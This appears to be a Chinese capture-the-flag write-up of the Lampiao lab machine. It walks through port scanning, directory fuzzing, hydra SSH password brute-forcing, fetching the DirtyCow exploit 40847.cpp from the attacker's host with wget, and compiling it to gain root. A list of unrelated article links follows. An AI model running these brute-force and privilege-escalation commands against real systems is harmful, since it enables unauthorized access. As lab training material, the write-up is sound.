当前位置: 首页 > news >正文

Lampiao靶场渗透wp-脏牛提权

nmap扫描端口
nmap -p- 192.168.111.100 -T4
image
开放三个端口,对80端口进行访问
image
没有什么信息,继续访问1898端口
dirsearch -u http://192.168.111.100:1898/
直接进行fuzz
image
比较多有用的信息,一个一个分析,由于我们得到了两个类似用户名的东西,并且ssh端口开放,但我们不知道密码,使用hydra进行爆破
hydra -l tiago -P /usr/share/wordlists/rockyou.txt 192.168.111.100 ssh
得到密码Virgulino
进行ssh连接
ssh tiago@192.168.111.100
image
执行命令,看看权限
image
权限比较低,我们直接进行信息收集,发现网站相关信息版本号 Drupal 7.54进行搜索(Drupal是一个开源内容管理系统(CMS))
msf进行搜索
image
选择40847.cpp脚本并拷贝到home目录下
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~
通过python开启本地http服务
python -m SimpleHTTPServer 5555
image
ssh得到脚本
wget http://192.168.111.25:5555/40847.cpp
image
进行编译,并运行
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
image
得到高权限账号密码,ssh登录即可

http://www.zskr.cn/news/11119.html

相关文章:

  • 社交网络架构。京东场景题:亿级用户100Wqps 社交关系如何设计?如何查看我的关注,关注我的?
  • go 面试题
  • 什么是sql 慢日志。哈罗面试:没开sql慢日志,怎么发现慢 sql?
  • 2025.9.24
  • StarRocks GitHub 工作流程
  • 【Selenium】消除Selenium报错:ChromeDriver与Chrome浏览器版本不匹配
  • Java第二次实验
  • 英语_阅读
  • 《新概念英语》在线朗读,单句点读,随时随地在线学习。
  • React学习教程,从入门到精通,React Router 语法知识点及使用手段详解(28)
  • 读书笔记:OpenPBR 规范(1)
  • CentOS 7 下 Kubernetes 集群搭建与配置指南
  • 【HD300I 】基于昇腾 310P 的全国产化智能计算模组
  • 【Origin】数据分析后的图,提取到外部图表
  • WPF Prism register interface and implemented interface service
  • 人机共生:AI如何重塑招聘全流程,赋能HR战略升级
  • hot100题简单题
  • 注意事项
  • 产品经理如何借力项目管理软件,驾驭复杂项目并准时上线?
  • 程序员的旅行神器:用AI提示词工程解决选择困难症
  • 西电PCB设计指南第4章学习笔记
  • 读取zip包中的文件
  • Attention复杂度解析与改进方向
  • 三维模型非结构化网格生成
  • Playwright MCP浏览器自动化指南 - 详解
  • 完整教程:【C++】STL简介+编码表+string引入
  • 基于节流的流水线并行推理优化——gLLM
  • Corral the Cows
  • 从范德蒙德矩阵聊开去.
  • Ansible自动化管理 - 指南